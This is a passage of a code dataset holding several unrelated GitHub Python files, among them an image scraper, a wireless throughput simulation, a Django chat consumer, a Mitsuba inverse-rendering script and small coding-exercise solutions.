self.ui.label_description.setText(\"LOADING DATABASE\"))\n QtCore.QTimer.singleShot(3000, lambda: self.ui.label_description.setText(\"\"\n \"LOADING USER INTERFACE\"))\n\n # SHOW MAIN WINDOW\n self.show()\n # END\n\n # APP FUNCTIONS\n def progress(self):\n\n global counter\n\n # SET VALUE TO PROGRESS BAR\n 
self.ui.progressBar.setValue(counter)\n\n # CLOSE SPLASH SCREE AND OPEN APP\n if counter > 100:\n # STOP TIMER\n self.timer.stop()\n\n # SHOW MAIN WINDOW\n # ADD FURTHER\n\n from home import main\n # CLOSE SPLASH SCREEN\n\n self.close()\n main()\n # INCREASE COUNTER\n counter += 1\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n window = SplashScreen()\n sys.exit(app.exec_())\n","repo_name":"raj713335/PARIKSHA","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"35261350345","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport os\r\nimport sys\r\nimport re\r\n\r\n\r\nglobal dir_path\r\ndir_path = \"d:\\\\bcy.net\\\\\"\r\n\r\ndef get_page(url):\r\n response = requests.get(url)\r\n content = BeautifulSoup(response.text, \"html.parser\")\r\n if content.find(text=\"尾页\"):\r\n return re.sub('(.+p=)|([^0-9]*)', \"\", str(content.find(text=\"尾页\").parent))\r\n else:\r\n return 0\r\n\r\n\r\ndef get_url(url): #获取网址\r\n response = requests.get(url)\r\n content = BeautifulSoup(response.text, \"html.parser\")\r\n\r\n '''\r\n global page_tag\r\n if page_tag == 0:\r\n page_tag = True\r\n # 正则表达式匹配尾页数,content.find().parent 表示内容对应的那一个tag\r\n global page\r\n if content.find(text=\"尾页\"):\r\n page = re.sub('(.+p=)|([^0-9]*)', \"\", str(content.find(text=\"尾页\").parent))\r\n '''\r\n\r\n url_back = content.find_all(attrs={\"class\": \"db posr ovf\"}) #根据HTML修改类型\r\n url_list = []\r\n for a in url_back:\r\n url_list.append(a.attrs.get(\"href\"))\r\n return url_list\r\n\r\n\r\ndef get_picture(url): #获取图片\r\n #作品编号\r\n item_id = re.search('[0-9]+', url).group(0)\r\n #粉丝可见标记\r\n fans_tag = False\r\n #作品地址\r\n url = \"https://bcy.net\"+url\r\n response = requests.get(url)\r\n content = BeautifulSoup(response.text, 'html.parser')\r\n # 作者名称\r\n name = content.find(class_='user-name').get_text()\r\n html_script = content.find_all('script')\r\n aim_script = ''\r\n for i in html_script:\r\n if 'window.__ssr_data' in i.text:\r\n aim_script = i\r\n break\r\n\r\n url_list = []\r\n aim_script = aim_script.text.split(\",\")\r\n for i in aim_script:\r\n\r\n if 'original_path' in i:\r\n i = re.sub(r\".*https\", \"\", i)\r\n i = re.sub(r\"\\\\\\\\u002F\", \"/\", i)\r\n i = \"https\"+re.sub(r\"\\\\\\\"}||]\", \"\", i)\r\n url_list.append(i)\r\n elif'粉丝可见' in i:\r\n fans_tag = True\r\n break\r\n\r\n if not(url_list or fans_tag):\r\n return None\r\n\r\n path = dir_path+name+'_'+item_id\r\n if not os.path.exists(path):\r\n # 如果不存在则创建目录\r\n os.makedirs(path)\r\n print(name+'_'+item_id + \" 作品开始保存\")\r\n else:\r\n # 如果目录存在则不创建,并提示目录已存在\r\n print(name+'_'+item_id+\" 已保存作品,无需重复保存\")\r\n print(\"_________________________________\")\r\n return None\r\n\r\n if fans_tag:\r\n fp = open(path+'/粉丝可见.txt ', 'w')\r\n fp.close()\r\n else:\r\n j = 1\r\n for i in url_list:\r\n fp = open(path + '/' + str(j) + '.jpg ', 'wb+')\r\n fp.write(requests.get(i, timeout=30).content)\r\n fp.close()\r\n j += 1\r\n\r\n print(\"保存完成\")\r\n print(\"_________________________________\")\r\n\r\n\r\nif __name__ == '__main__':\r\n print(\"输入你要搜索的关键字吧,就跟半次元里的搜索一样(默认路径D:\\ bcy.net 保存图片)\")\r\n name = input()\r\n print(\"如果想更改图片保存路径请以类似D:\\ bcy.net 的格式输入路径,否则请输入回车(Enter)\")\r\n path = input()\r\n if path != \"\":\r\n print(\"保存路径修改为:\"+path)\r\n dir_path = path\r\n\r\n dir_path = dir_path+name+'\\\\'\r\n url = \"https://bcy.net/search/home?k=\"+name\r\n page = int(get_page(url))\r\n\r\n if page == 
0:\r\n print(\"无相关内容\")\r\n sys.exit(1)\r\n\r\n for i in range(1, page+1):\r\n print(i)\r\n print(\"_________________________________\")\r\n u_l = get_url(url + \"&p=\"+str(i))\r\n for i in u_l:\r\n try:\r\n get_picture(i)\r\n except:\r\n continue\r\n","repo_name":"jososo/bcy_picture_spider","sub_path":"getpic.py","file_name":"getpic.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"}
{"seq_id":"23684561435","text":"import unittest\nimport os\nfrom textfileconverter import FileHandler, sanitize_input, convert_to_custom_format\n\nclass TestTextFileConverter(unittest.TestCase):\n def setUp(self):\n self.file_handler = FileHandler()\n self.test_file_path = 'test_file.txt'\n self.test_content = 'Hello\\nWorld'\n self.sanitized_content = 'Hello\\nWorld'\n self.custom_format_content = ' - \"Hello\"\\n - \"World\"'\n\n def test_read_file(self):\n with open(self.test_file_path, 'w') as f:\n f.write(self.test_content)\n content = self.file_handler.read_file(self.test_file_path)\n self.assertEqual(content, self.test_content)\n\n def test_read_file_non_existent(self):\n with self.assertRaises(Exception):\n self.file_handler.read_file('non_existent_file.txt')\n\n def test_write_file(self):\n self.file_handler.write_file(self.test_file_path, self.test_content)\n with open(self.test_file_path, 'r') as f:\n content = f.read()\n self.assertEqual(content, self.test_content)\n\n def test_sanitize_input(self):\n sanitized_text = sanitize_input(self.test_content)\n self.assertEqual(sanitized_text, self.sanitized_content)\n\n def test_convert_to_custom_format(self):\n custom_text = convert_to_custom_format(self.sanitized_content)\n self.assertEqual(custom_text, self.custom_format_content)\n\n def tearDown(self):\n try:\n os.remove(self.test_file_path)\n except:\n pass\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"gladiopeace/repo1_test","sub_path":"textfileconverter_test.py","file_name":"textfileconverter_test.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"36530347030","text":"import numpy as np\nimport math\nimport matplotlib.pyplot as plt\n# import opensimplex \n\nAntenna_gain=18 #dBi\n# Shadow_fading=4 #dB\n\ncarrier_frequency = 28 # GHz\n\ndef DoDistance(x1,y1,x2,y2):\n return np.sqrt((x2-x1)**2 + (y2-y1)**2)\n\ndef DoThroughput(transmit_bandwidth,SNR):\n \"\"\"\n calculate throughput by shannon capacity\n Arg:\n transmit_bandwidth: unit(Hz)\n SNR : Signal-to-noise ratio(SNR) no unit\n \n return:\n Throughput\n \"\"\"\n return transmit_bandwidth*np.log2(1+SNR)\n\ndef DoSNR(Conncection_Status,Recived_power,Noise_power):\n \"\"\"\n calculate SNR \n Arg:\n Recived_power : unit(w)\n Noise_power: unit(w)\n Conncection_Status : no unit\n \n return:\n SNR\n \"\"\"\n \n\n return (Conncection_Status*Recived_power)/Noise_power\n\ndef DoChannelModel(Transmit_power,Antenna_gain,Path_loss,Los_Probability):\n \"\"\"\n calculate Recived_power by 3GPP spec\n Arg:\n Recived_power: unit (dBm)\n Transmit_power: unint (dB)\n Antenna_gain: unit (dB)\n Path_loss: unit (dB)\n Shadow_fading: unit (dB)\n \n return:\n Recived_power\n \"\"\"\n if Transmit_power == float('-Inf'):\n return float('-Inf')\n\n if Los_Probability == 1:\n Recived_power = Transmit_power + Antenna_gain - Path_loss - 4\n else:\n Recived_power = Transmit_power + Antenna_gain - Path_loss - 8.2\n \n return Recived_power\n\ndef 
IndoorDoChannelModel(Transmit_power,Antenna_gain,Path_loss,Los_Probability):\n \"\"\"\n calculate Recived_power by 3GPP spec\n Arg:\n Recived_power: unit (dBm)\n Transmit_power: unint (dB)\n Antenna_gain: unit (dB)\n Path_loss: unit (dB)\n Shadow_fading: unit (dB)\n \n return:\n Recived_power\n \"\"\"\n if Transmit_power == float('-Inf'):\n return float('-Inf')\n\n if Los_Probability == 1:\n Recived_power = Transmit_power + Antenna_gain - Path_loss - 4\n else:\n Recived_power = Transmit_power + Antenna_gain - Path_loss - 8.2\n \n return Recived_power\n\ndef DoPathLoss(Los_Probability,carrier_frequency,Distance):\n \"\"\"\n calculate path loss by 3GPP spec\n Arg:\n Los_Probability: unit (dB)\n carrier_frequency: unint (GHz)\n Distance: unit (m)\n \n return:\n Path_loss: unit (dB)\n \"\"\"\n Decied_Conncection_Status=np.random.rand()\n if Los_Probability == 1:\n \n return 32.4+21*math.log10(Distance)+20*math.log10(carrier_frequency) ##unit(dB)\n else:\n \n return 32.4+31.9*math.log10(Distance)+20*math.log10(carrier_frequency) ##unit(dB)\n\n\ndef IndoorDoPathLoss(Los_Probability,carrier_frequency,Distance):\n \"\"\"\n calculate path loss by 3GPP spec\n Arg:\n Los_Probability: unit (dB)\n carrier_frequency: unint (GHz)\n Distance: unit (m)\n \n return:\n Path_loss: unit (dB)\n \"\"\"\n Decied_Conncection_Status=np.random.rand()\n if Los_Probability == 1:\n \n return 31.84+21.50*np.log10(Distance)+19.00*np.log10(carrier_frequency) ##unit(dB)\n else:\n \n return 32.4+31.9*np.log10(Distance)+20*np.log10(carrier_frequency) ##unit(dB)\n\ndef LosProbability(distance):\n \"\"\"\n calculate Line-of-sight Probability by 3GPP spec\n Arg:\n Distance: unit (m)\n \n return:\n Line-of-sight Probability\n \"\"\"\n minimum_distance =18\n if distance <= minimum_distance:\n return 1\n else:\n return (18/distance)+(np.exp(-1*distance/36)*(1-(18/distance)))\n\n# def DoConectionStatus(Distance,TransmitPower):\n# Path_loss = DoPathLoss(1,carrier_frequency,Distance)\n# DoChannelModel(Transmit_power,Antenna_gain,Path_loss,Shadow_fading)\n\ndef dBmToWatt(dBm):\n \n if dBm == float('-Inf'):\n return 0\n return 10**((dBm-30)/10)\n\ndef wTodBm(mW):\n if mW == 0 :\n return float('-Inf')\n return 10 * np.log10(mW)+30\n\n\n# def simplexnoise(seed,x_asix,y_asix):\n# simplex = opensimplex()\n# A = np.zeros([x_asix, y_asix])\n# for y in range(0, x_asix):\n# for x in range(0, y_asix):\n# value = simplex.noise2d(x,y)\n# color = int((value + 1) * 128)\n# A[x, y] = color\n\n# plt.imshow(A)\n# plt.show()\n\n\n\n \n\n\nif __name__ == '__main__':\n\n X_rows = 100\n Y_cols = 100\n # simplexnoise(123,X_rows,Y_cols)\n \n LOS_NLOS = 1\n N0=-83.02 #dBm\n transmit_bandwidth = 1e+8\n throughput_2D_total = np.zeros((X_rows,Y_cols), dtype=float)\n distance_2D= np.empty((X_rows,Y_cols), dtype=float)\n indterval = 1\n base_satation = np.array([[15.1,20.1],[25.1,80.1],[80.5,43.2]])\n transmit_power = 0.1 #W\n powerdB = wTodBm(transmit_power)\n for base in base_satation:\n # print(base)\n # print('===========================')\n # print(throughput_2D_total)\n # print('===========================')\n throughput_2D = np.empty((X_rows,Y_cols), dtype=float)\n distance_2D= np.empty((X_rows,Y_cols), dtype=float)\n for x in range(X_rows):\n for y in range(Y_cols):\n distance = DoDistance(x*indterval,y*indterval,base[0],base[1])\n # print(f'ue_x:{x*indterval},ue_y:{y*indterval},bs_x:{base[0]},bs_y:{base[1]} , distance:{distance}')\n \n ### Indoor LOS calculation\n Indoor_LOS_Path_loss=IndoorDoPathLoss(LOS_NLOS,carrier_frequency,distance)\n 
Indoor_LOS_Recived_power = IndoorDoChannelModel(powerdB,Antenna_gain,Indoor_LOS_Path_loss,LOS_NLOS)\n Indoor_LOS_SNR=DoSNR(1,dBmToWatt(Indoor_LOS_Recived_power),dBmToWatt(N0))\n throughput_2D[x,y] = DoThroughput(transmit_bandwidth,Indoor_LOS_SNR)\n ### Indoor LOS calculation\n \n throughput_2D_total += throughput_2D\n levels = np.linspace(0,3000,30)\n x_axis,y_axis = np.meshgrid(range(X_rows),range(Y_cols))\n fig,ax = plt.subplots()\n throughput_2D_total=throughput_2D_total/(1e+6)\n \n thr=ax.contour(x_axis,y_axis,throughput_2D_total,levels=levels)\n \n ax.clabel(thr,inline=True,fontsize=10)\n \n ax.set_xlabel('x coordinate (m)')\n ax.set_ylabel('y coordinate (m)')\n ax.set_title('Analyze user rates at different coordubates (Mbps)\\nLOS Urban Micro cell (UMi)')\n ax.set_aspect('equal')\n ax.scatter(base_satation[:,1],base_satation[:,0],c='red',marker='^',label='Base station',s=100,zorder=10)\n ax.legend()\n plt.savefig('thr.jpg')\n plt.show() \n # for en in np.nditer(distance_2D):\n # print(en)\n print(throughput_2D)\n exit(1)\n Distance = 100\n N0=-83.02 #dBm\n recp=-115.44\n transmit_bandwidth = 1e+8\n transmit_power = 0.2 # W\n LOS_NLOS = 1\n dis = 100\n for dis in range(1,100):\n powerdB = wTodBm(transmit_power)\n print(powerdB)\n LOS_Path_loss=DoPathLoss(LOS_NLOS,carrier_frequency,dis)\n NLOS_Path_loss=DoPathLoss(0,carrier_frequency,dis)\n Indoor_LOS_Path_loss=IndoorDoPathLoss(LOS_NLOS,carrier_frequency,dis)\n print(f'==============Distance == {dis}m ==============')\n print(f'LOS_Path_loss : {LOS_Path_loss} , NLOS_Path_loss:{NLOS_Path_loss}, Indoor_LOS_Path_loss:{Indoor_LOS_Path_loss}')\n # print(Path_loss)\n Indoor_LOS_Recived_power = IndoorDoChannelModel(powerdB,Antenna_gain,Indoor_LOS_Path_loss,LOS_NLOS)\n LOS_Recived_power=DoChannelModel(powerdB,Antenna_gain,LOS_Path_loss,LOS_NLOS)\n NLOS_Recived_power=DoChannelModel(powerdB,Antenna_gain,NLOS_Path_loss,0)\n print(f'LOS_Recived_power:{LOS_Recived_power} , NLOS_Recived_power:{NLOS_Recived_power},Indoor_LOS_Recived_power : {Indoor_LOS_Recived_power}')\n Indoor_LOS_SNR=DoSNR(1,dBmToWatt(Indoor_LOS_Recived_power),dBmToWatt(N0))\n LOS_SNR=DoSNR(1,dBmToWatt(LOS_Recived_power),dBmToWatt(N0))\n NLOS_SNR=DoSNR(1,dBmToWatt(NLOS_Recived_power),dBmToWatt(N0))\n print(f'LOS_SNR:{LOS_SNR} , NLOS_SNR:{NLOS_SNR},Indoor_LOS_SNR:{Indoor_LOS_SNR}')\n # SNR = DoSNR(1,dBToWatt(-106.41),dBToWatt(N0))\n Indoor_LOS_thr = DoThroughput(transmit_bandwidth,Indoor_LOS_SNR)\n LOS_thr=DoThroughput(transmit_bandwidth,LOS_SNR)\n NLOS_thr=DoThroughput(transmit_bandwidth,NLOS_SNR)\n print(f'LOS_thr : {LOS_thr:g} , NLOS_thr : {NLOS_thr:g}, Indoor_LOS_thr: {Indoor_LOS_thr:g}')\n print('============================')\n\n \n # NNo\n # NNo","repo_name":"Carter0212/Thesis_HHO_SMA","sub_path":"thr.py","file_name":"thr.py","file_ext":"py","file_size_in_byte":8397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71328981025","text":"import json\n\nfrom channels.generic.websocket import AsyncWebsocketConsumer\n\nfrom chat.consumer_helper import save_user_channel_name, set_user_offline, get_user_channel_name, save_chat\n\n\nclass PersonalChatConsumer(AsyncWebsocketConsumer):\n\n def __init__(self, *args, **kwargs):\n super().__init__(args, kwargs)\n self.user_id = None\n\n # connect user\n async def connect(self):\n self.user_id = self.scope['url_route']['kwargs']['user_id']\n await self.accept()\n await save_user_channel_name(user_id=self.user_id, channel_name=self.channel_name)\n\n # disconnect user\n async def 
disconnect(self, code):\n await set_user_offline(self.user_id)\n\n # send msg after validating user online status\n async def receive(self, text_data=None, bytes_data=None):\n text_data_json = json.loads(text_data)\n message = text_data_json['message']\n receiver_user_id = text_data_json['send_to']\n\n send_to = await get_user_channel_name(user_id=text_data_json['send_to'])\n\n if send_to:\n await self.channel_layer.send(\n send_to,\n {\n 'type': 'chatroom.message',\n 'message': message,\n 'receiver_user_id': receiver_user_id,\n 'sender_id': self.user_id\n }\n )\n else:\n print(\"Consumer receive method error.\")\n\n # send message over ws\n async def chatroom_message(self, event):\n await self.send(\n text_data=json.dumps(\n {\n 'message': event['message'],\n 'sender_id': event['sender_id']\n }\n )\n )\n\n await save_chat(event)\n","repo_name":"a-rcane/chatapp","sub_path":"chat/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"15862883403","text":"#!/usr/bin/env python\n\n#%%\nimport mitsuba as mi\nimport drjit as dr\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport json\n\nmi.set_variant('cuda_ad_rgb')\n\noutput_dir_base = 'inverse-rendering'\nos.makedirs(output_dir_base, exist_ok=True)\n\n#%% Load scene and parameters\n\nscenes = [\n { 'name': 'christmas-tree',\n 'path': '../scenes/christmas-tree/scene.xml',\n 'key': 'mat-pine.brdf_0.base_color.data',\n 'restir_spp': 1,\n 'restir_mcap': 32,\n 'mitsuba_spp': 1,\n 'time': 350e3,\n },\n { 'name': 'tire',\n 'path': '../scenes/tire/scene.xml',\n 'key': 'mat-tire.brdf_0.roughness.data',\n 'restir_spp': 1,\n 'mitsuba_spp': 1,\n 'time': 90e3,\n 'learning_rate': 0.005,\n },\n { 'name': 'ashtray',\n 'path': '../scenes/ashtray/scene.xml',\n 'key': 'mat-ashtray.brdf_0.anisotropic.data',\n 'restir_spp': 1,\n 'mitsuba_spp': 1,\n 'time': 30e3,\n },\n { 'name': 'chalice',\n 'path': '../scenes/chalice/scene.xml',\n 'key': 'mat-chalice.brdf_0.roughness.data',\n 'restir_spp': 1,\n 'mitsuba_spp': 1,\n 'time': 30e3,\n },\n]\nscene_idx = 0\n\nrender_spp = 512\nspp_forward = 32\nequal_time_iterations = 20\n\ns = scenes[scene_idx]\nscene_path, scene_name, key = s['path'], s['name'], s['key']\noutput_dir = os.path.join(output_dir_base, scene_name)\nos.makedirs(output_dir, exist_ok=True)\n\ndef convert_to_lum(grad_tensor, extend_dim=False):\n if len(grad_tensor.shape) != 3:\n return grad_tensor\n if grad_tensor.shape[2] == 1:\n if extend_dim:\n return grad_tensor\n return grad_tensor[:,:,0]\n grad_color = dr.unravel(mi.Color3f, dr.ravel(grad_tensor[...,:3]))\n grad_lum = mi.luminance(grad_color)\n shape = (grad_tensor.shape[0], grad_tensor.shape[1], 1) if extend_dim else \\\n (grad_tensor.shape[0], grad_tensor.shape[1])\n return mi.TensorXf(grad_lum, shape=shape)\n\nprint(f'-------------------- Running {scene_name} -------------------------')\n\nscene = mi.load_file(scene_path, integrator='restir_dr')\nis_base_color = 'base_color' in key\nif 'learning_rate' in s:\n learning_rate = s['learning_rate']\nelif is_base_color:\n learning_rate = 0.1\nelse:\n learning_rate = 0.01\n\nimage_gt = mi.render(scene, seed=0, spp=render_spp);\nmi.util.write_bitmap(os.path.join(output_dir, 'render_gt.exr'), image_gt)\n\nparams = mi.traverse(scene)\nparam_ref = mi.TensorXf(params[key])\nparam_shape = np.array(params[key].shape)\n\nparam_initial = np.full(param_shape.tolist(), 0.5)\nif param_shape[2] == 4:\n 
param_initial[:,:,3] = 1\n param_ref[:,:,3] = 1\nparams[key] = mi.TensorXf(param_initial)\n\nparams.update();\n\nimage_initial = mi.render(scene, seed=0, spp=render_spp);\n\nopt = mi.ad.Adam(lr=learning_rate)\nopt[key] = params[key]\nparams.update(opt);\nscene.integrator().param_name = key\n\ndr.set_flag(dr.JitFlag.KernelHistory, 1)\n\ndef get_elapsed_execution_time():\n hist = dr.kernel_history()\n elapsed_time = 0\n for entry in hist:\n elapsed_time += entry['execution_time']\n return elapsed_time\n\ndef relse(a, b):\n return dr.sqr(a - b) / (dr.sqr(b) + 1e-2)\n\ndef relmse(a, b):\n return dr.mean(relse(a, b))\n\ndef mae(a, b):\n return dr.mean(dr.abs(a - b))\n\ndef derivative_err(img, ref):\n return dr.sum(relse(img, ref)) / dr.count(dr.neq(ref.array, 0))\n\ndef loss_func(image):\n return relmse(image, image_gt)\n\nparams[key] = mi.TensorXf(param_initial)\nparams.update();\n\nopt = mi.ad.Adam(lr=learning_rate)\nopt[key] = params[key]\nparams.update(opt);\n\ndef get_equal_time_optimization(use_ref, n_time, spp_forward, spp_grad, M_cap=None):\n np.random.seed(0)\n \n # Reset initial params\n opt.reset(key)\n opt[key] = mi.TensorXf(param_initial)\n params.update(opt);\n\n scene.integrator().use_ref = use_ref\n scene.integrator().use_positivization = True\n scene.integrator().enable_temporal_reuse = True\n scene.integrator().M_cap = M_cap\n scene.integrator().reset()\n\n it = 0\n total_time = 0\n times = []\n losses = []\n while True:\n # Perform a (noisy) differentiable rendering of the scene\n image = mi.render(scene, params, spp=spp_forward,\n spp_grad=spp_grad,\n seed=np.random.randint(2**31))\n\n # Evaluate the objective function from the current rendered image\n loss = loss_func(image)\n\n # Backpropagate through the rendering process\n dr.backward(loss)\n\n # Optimizer: take a gradient descent step\n opt.step()\n\n # Post-process the optimized parameters to ensure legal color values.\n opt[key] = dr.clamp(opt[key], 0.0, 1.0)\n\n # Update the scene state to the new optimized values\n params.update(opt)\n\n total_time += get_elapsed_execution_time()\n if total_time > n_time:\n break\n times.append(total_time / 1e3)\n losses.append(loss[0])\n\n print(f'-- Iteration {it} -- Loss {losses[-1]:.3f} --')\n\n it += 1\n\n return times, losses, mi.TensorXf(params[key])\n\n#%% Run equal time optimization\n\nrestir_times, restir_losses, restir_param = \\\n get_equal_time_optimization(False, s['time'], spp_forward, s['restir_spp'], M_cap=s.get('restir_mcap', 16))\n\nmitsuba_times, mitsuba_losses, mitsuba_param = \\\n get_equal_time_optimization(True, s['time'], spp_forward, s['mitsuba_spp']) \n\n#%% Output equal time optimization\nplt.clf()\nplt.figure(figsize=(10, 4), dpi=100, constrained_layout=True);\nplt.plot(mitsuba_times, mitsuba_losses, 'm-o', label='Mitsuba 3', linewidth=6.0, markersize=4.0, mfc='white')\nplt.plot(restir_times, restir_losses, 'c-o', label='Ours', linewidth=6.0, markersize=4.0, mfc='white')\nplt.xlabel('Time (s)');\nplt.ylabel('Error');\nplt.yscale('log')\nplt.legend();\nplt.savefig(os.path.join(output_dir, 'inv_convergence.pdf'), bbox_inches='tight', pad_inches=0.0)\n\n#%% Output equal time final image\nparams[key] = mitsuba_param\nparams.update();\nmitsuba_image = mi.render(scene, seed=0, spp=render_spp);\nmi.util.write_bitmap(os.path.join(output_dir, 'render_final_mitsuba.exr'), mitsuba_image)\n\nparams[key] = restir_param\nparams.update();\nrestir_image = mi.render(scene, seed=0, spp=render_spp);\nmi.util.write_bitmap(os.path.join(output_dir, 'render_final_restir.exr'), 
restir_image)\n\n#%%\nrestir_img_err = loss_func(restir_image)[0]\nmitsuba_img_err = loss_func(mitsuba_image)[0]\n\nprint(\n f'ReSTIR, error: {restir_img_err:.3e} ({restir_img_err/mitsuba_img_err:.2f}x)\\n'\n f'Mitsuba, error: {mitsuba_img_err:.3e} (1.00x)\\n'\n)\n\nwith open(os.path.join(output_dir, 'inv_convergence.json'), 'w') as f:\n json_str = json.dumps({\n 'mitsuba_times': mitsuba_times,\n 'mitsuba_losses': mitsuba_losses,\n 'restir_times': restir_times,\n 'restir_losses': restir_losses,\n 'mitsuba_img_err': mitsuba_img_err,\n 'restir_img_err': restir_img_err,\n 'img_err_reduction': restir_img_err/mitsuba_img_err,\n }, indent=2)\n f.write(json_str)\n","repo_name":"wchang22/ReSTIR_DR","sub_path":"notebooks/inverse-rendering.py","file_name":"inverse-rendering.py","file_ext":"py","file_size_in_byte":6934,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"7"} +{"seq_id":"27986385223","text":"# I'm sure, you know Google's \"Did you mean ...?\", when you entered a search term and mistyped a word. In this kata we want to implement something similar.\n# You'll get an entered term (lowercase string) and an array of known words (also lowercase strings). Your task is to find out, which word from the dictionary\n# is most similar to the entered one. The similarity is described by the minimum number of letters you have to add, remove or replace in order to get from the\n# entered word to one of the dictionary. The lower the number of required changes, the higher the similarity between each two words.\n# Same words are obviously the most similar ones. A word that needs one letter to be changed is more similar to another word that needs 2 (or more) letters to be\n# changed. E.g. the mistyped term berr is more similar to beer (1 letter to be replaced) than to barrel (3 letters to be changed in total).\n#\n# Extend the dictionary in a way, that it is able to return you the most similar word from the list of known words.\n#\n# Code Examples:\n#\n# fruits = new Dictionary(['cherry', 'pineapple', 'melon', 'strawberry', 'raspberry']);\n# fruits.findMostSimilar('strawbery'); // must return \"strawberry\"\n# fruits.findMostSimilar('berry'); // must return \"cherry\"\n#\n# things = new Dictionary(['stars', 'mars', 'wars', 'codec', 'codewars']);\n# things.findMostSimilar('coddwars'); // must return \"codewars\"\n#\n# languages = new Dictionary(['javascript', 'java', 'ruby', 'php', 'python', 'coffeescript']);\n# languages.findMostSimilar('heaven'); // must return \"java\"\n# languages.findMostSimilar('javascript'); // must return \"javascript\" (same words are obviously the most similar ones)\n# I know, many of you would disagree that java is more similar to heaven than all the other ones, but in this kata it is ;)\n#\n# Additional notes:\n# there is always exactly one possible correct solution\n\nclass Dictionary:\n def __init__(self,words):\n self.words=words\n def find_most_similar(self,term):\n # break down the term to list letters\n # loop through the words class, first check if the term is in the words list. 
if yes return\n # if not check each word.\n diff = len(list(term))\n term = term.lower()\n similar_word = None\n cost = 1000\n sum_letters = 0\n for one in self.words:\n word = one.lower()\n if term == word:\n return one\n else:\n different_letters = [0 if letter in word else 1 for letter in term]\n diff_letter_len = abs (len (list (word)) - len (list (term)))\n if cost > sum(different_letters)+ diff_letter_len:\n cost = sum(different_letters)+ diff_letter_len\n similar_word = one\n return similar_word\n\n\n\nwords=['java', 'python']\ntest_dict = Dictionary (words)\n\nprint(test_dict.find_most_similar('heaven'))\n# edit distance\n\n","repo_name":"DenizSka/CodingNomads","sub_path":"notes_to_self/coding_challenge/03_07_did_you_mean.py","file_name":"03_07_did_you_mean.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"13591775681","text":"class Solution:\n def wordPattern(self, pattern: str, s: str) -> bool:\n letterToWord = {}\n usedWordSet = set()\n stringArr = s.split(\" \")\n\n # Edge case if stringArr and pattern lens are not equal\n if len(stringArr) != len(pattern):\n return False\n\n for i in range(len(pattern)):\n word = letterToWord.get(pattern[i], -1)\n if word == -1 and stringArr[i] not in usedWordSet:\n letterToWord[pattern[i]] = stringArr[i]\n usedWordSet.add(stringArr[i])\n continue\n if word != stringArr[i]:\n return False\n return True\n\n # Time Complexity: O(n)\n # Space Complexity: O(n)\n # Datastructure(s): Hashtable, Set\n # Algorithm(s): None\n # Pattern: None\n \n ###\n # Solve Description: Instantiate a hashtable for mapping letter to word and a set for keeping track\n # of words that have been stored into the table. Loop through each char in the pattern, mapping \n # the corresponding word in the same position to the char if it doesn't exist in the table AND if\n # the word has not been mapped before (each word can only be mapped once). If the current char has\n # a word it maps to, check if the retrieved word is the same as the string in the current pattern \n # to word position. Return False if they do not match. 
Otherwise, if the whole loop completes, \n # return True\n ###\n \n # Link: https://leetcode.com/problems/word-pattern/\n\n \n","repo_name":"Juichilee/Solved-LeetCode-Problems","sub_path":"Python/word_pattern.py","file_name":"word_pattern.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"37672435004","text":"from slurmpy import Slurm\n\ndef get_slurm():\n # if segment_len <= 512:\n # constraint = \"rtx2080ti\"\n # elif test:\n # constraint = \"rtx2080ti\"\n # else:\n # constraint = \"rtx8000\"\n constraint = \"rtx2080ti\"\n sbatch_arguments = {\"account\": \"chacha\", \n \"partition\": \"cdac-contrib\", # \"dev\"\n \"mem\": \"50gb\",\n \"time\": \"04:00:00\",\n \"output\": \"/home/chacha/slurm/out/explain_teach%j.%N.stdout\",\n \"error\": \"/home/chacha/slurm/out/explain_teach%j.%N.stderr\",\n \"chdir\": \"/home/chacha/slurm\",\n \"gpus-per-node\": f\"{1}\",\n \"ntasks\": \"1\",\n \"nodes\": \"1\",\n # \"nodelist\": \"a007\",\n \"constraint\": constraint,\n \"signal\": \"SIGUSR1@120\"}\n\n # if dependent_job:\n # sbatch_arguments.update({\"dependency\": f\"afterany:{dependent_job}\"})\n\n s = Slurm(\"explain_teach\", sbatch_arguments, bash_strict=False)\n return s\n\n# experiments = [\n# ('mortality', '24', 'all_but_discharge'),\n# ('readmission', 'retro', 'discharge'),\n# ('readmission', 'retro', 'all')\n# ]\n\n# segment_mapping = {318:512, 2500:3000}\n\n# balanced_flag = [False, True]\n# # structured = True\n# structured_flag = [True, ]\n# models = [\n# # (\"emilyalsentzer/Bio_ClinicalBERT\", 318),\n# # (\"emilyalsentzer/Bio_Discharge_Summary_BERT\", 318),\n# # (\"bert-base-uncased\", 318),\n# (\"roberta-base\", 318),\n# (\"microsoft/deberta-v3-base\", 318),\n# # (\"allenai/longformer-base-4096\", 2500)\n# ]\n# learning_rates = [\n# \"5e-3\", \"1e-3\", \"5e-4\",\n# # \"5e-4\", \"5e-5\", \"5e-6\"\n# ]\n#####\n# Important\n# n_gpu = 4\n# train = True\n# test = True\n#####\n# print(f\"Training: {train}, Testing: {test}\")\n# splits = ['train', 'valid', 'test']\n# TODO: add mem-per-gpu flag\n\n\ncommand = f\"\"\"\n source ~/.bashrc\n whoami\n conda activate teaching\n cd /net/scratch/chacha/explain_teach/models\n srun python RESN.py \\\n --embed_dim=10 \\\n --wandb_mode=online \\\n --wandb_group=resn-emb2 \\\n 